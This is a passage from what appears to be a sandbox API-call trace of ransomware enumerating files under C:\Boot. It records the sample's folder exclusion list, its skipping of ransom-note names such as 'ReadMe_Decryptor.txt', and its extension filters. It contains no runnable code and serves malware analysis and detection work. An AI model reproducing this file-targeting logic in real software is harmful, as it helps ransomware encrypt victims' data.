ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.056] FindClose (in: hFindFile=0x758a88 | out: hFindFile=0x758a88) returned 1 [0106.056] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0106.056] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0106.056] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0106.056] lstrlenW (lpString="ko-KR") returned 5 [0106.056] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ko-KR" | out: lpString1="C:\\Boot\\ko-KR") returned="C:\\Boot\\ko-KR" [0106.056] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Windows") returned -1 [0106.056] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\ProgramData") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Intel") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\msys32") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Qt") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\ProgramData") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Program Files") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Windows") returned -1 [0106.057] lstrcmpiW (lpString1="C:\\Boot\\ko-KR", lpString2="C:\\Program Files (x86)") returned -1 [0106.057] lstrcatW (in: lpString1="C:\\Boot\\ko-KR", lpString2="\\" | out: lpString1="C:\\Boot\\ko-KR\\") returned="C:\\Boot\\ko-KR\\" [0106.057] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0106.057] FindFirstFileExW (in: lpFileName="C:\\Boot\\ko-KR\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758b88 [0106.193] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.193] FindNextFileW (in: hFindFile=0x758b88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.193] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.193] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.193] FindNextFileW (in: hFindFile=0x758b88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.193] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.193] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.193] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.193] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.193] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.193] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.193] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.193] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.193] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.194] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.194] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757450 [0106.194] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ee8 [0106.194] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757450 | out: hHeap=0x6d0000) returned 1 [0106.194] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7f30 [0106.194] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ee8 | out: hHeap=0x6d0000) returned 1 [0106.194] FindNextFileW (in: hFindFile=0x758b88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.194] FindClose (in: hFindFile=0x758b88 | out: hFindFile=0x758b88) returned 1 [0106.194] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0106.194] lstrcmpW (lpString1="memtest.exe", lpString2=".") returned 1 [0106.194] lstrcmpW (lpString1="memtest.exe", lpString2="..") returned 1 [0106.194] lstrcmpiW (lpString1="memtest.exe", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.194] lstrcmpiW (lpString1="memtest.exe", lpString2="Decryptor_Info.hta") returned 1 [0106.194] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0106.194] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0106.194] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0106.195] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0106.195] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0106.195] lstrlenW (lpString="nb-NO") returned 5 [0106.195] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="nb-NO" | out: lpString1="C:\\Boot\\nb-NO") returned="C:\\Boot\\nb-NO" [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Windows") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\ProgramData") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Intel") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\msys32") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Qt") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\ProgramData") returned -1 [0106.195] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Program Files") returned -1 [0106.196] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Windows") returned -1 [0106.196] lstrcmpiW (lpString1="C:\\Boot\\nb-NO", lpString2="C:\\Program Files (x86)") returned -1 [0106.196] lstrcatW (in: lpString1="C:\\Boot\\nb-NO", lpString2="\\" | out: lpString1="C:\\Boot\\nb-NO\\") returned="C:\\Boot\\nb-NO\\" [0106.196] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0106.196] FindFirstFileExW (in: lpFileName="C:\\Boot\\nb-NO\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758b88 [0106.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.196] FindNextFileW (in: hFindFile=0x758b88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.196] FindNextFileW (in: hFindFile=0x758b88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.196] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.197] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.197] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.197] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.197] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.197] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.197] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.197] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.197] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.197] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757450 [0106.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ee8 [0106.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757450 | out: hHeap=0x6d0000) returned 1 [0106.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7f78 [0106.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ee8 | out: hHeap=0x6d0000) returned 1 [0106.197] FindNextFileW (in: hFindFile=0x758b88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.197] FindClose (in: hFindFile=0x758b88 | out: hFindFile=0x758b88) returned 1 [0106.197] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0106.198] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0106.198] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0106.198] lstrlenW (lpString="nl-NL") returned 5 [0106.198] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="nl-NL" | out: lpString1="C:\\Boot\\nl-NL") returned="C:\\Boot\\nl-NL" [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Windows") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\ProgramData") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.198] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Intel") returned -1 [0106.199] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\msys32") returned -1 [0106.199] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Qt") returned -1 [0106.199] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\ProgramData") returned -1 [0106.199] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Program Files") returned -1 [0106.199] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Windows") returned -1 [0106.199] lstrcmpiW (lpString1="C:\\Boot\\nl-NL", lpString2="C:\\Program Files (x86)") returned -1 [0106.199] lstrcatW (in: lpString1="C:\\Boot\\nl-NL", lpString2="\\" | out: lpString1="C:\\Boot\\nl-NL\\") returned="C:\\Boot\\nl-NL\\" [0106.199] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0106.199] FindFirstFileExW (in: lpFileName="C:\\Boot\\nl-NL\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c08 [0106.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.387] FindNextFileW (in: hFindFile=0x758c08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.390] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.390] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.390] FindNextFileW (in: hFindFile=0x758c08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.390] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.390] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.390] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.390] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.390] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.390] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.390] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.390] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.390] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.390] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x729610 [0106.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b00a8 [0106.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x729610 | out: hHeap=0x6d0000) returned 1 [0106.391] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b00f0 [0106.391] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00a8 | out: hHeap=0x6d0000) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x758c08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.391] FindClose (in: hFindFile=0x758c08 | out: hFindFile=0x758c08) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0106.391] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0106.391] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0106.391] lstrlenW (lpString="pl-PL") returned 5 [0106.391] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pl-PL" | out: lpString1="C:\\Boot\\pl-PL") returned="C:\\Boot\\pl-PL" [0106.391] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Windows") returned -1 [0106.391] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.391] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.391] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\ProgramData") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Intel") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\msys32") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Qt") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\ProgramData") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Program Files") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Windows") returned -1 [0106.392] lstrcmpiW (lpString1="C:\\Boot\\pl-PL", lpString2="C:\\Program Files (x86)") returned -1 [0106.392] lstrcatW (in: lpString1="C:\\Boot\\pl-PL", lpString2="\\" | out: lpString1="C:\\Boot\\pl-PL\\") returned="C:\\Boot\\pl-PL\\" [0106.392] lstrlenW (lpString="C:\\Boot\\pl-PL\\") returned 14 [0106.393] FindFirstFileExW (in: lpFileName="C:\\Boot\\pl-PL\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758c08 [0106.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.393] FindNextFileW (in: hFindFile=0x758c08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.393] FindNextFileW (in: hFindFile=0x758c08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, 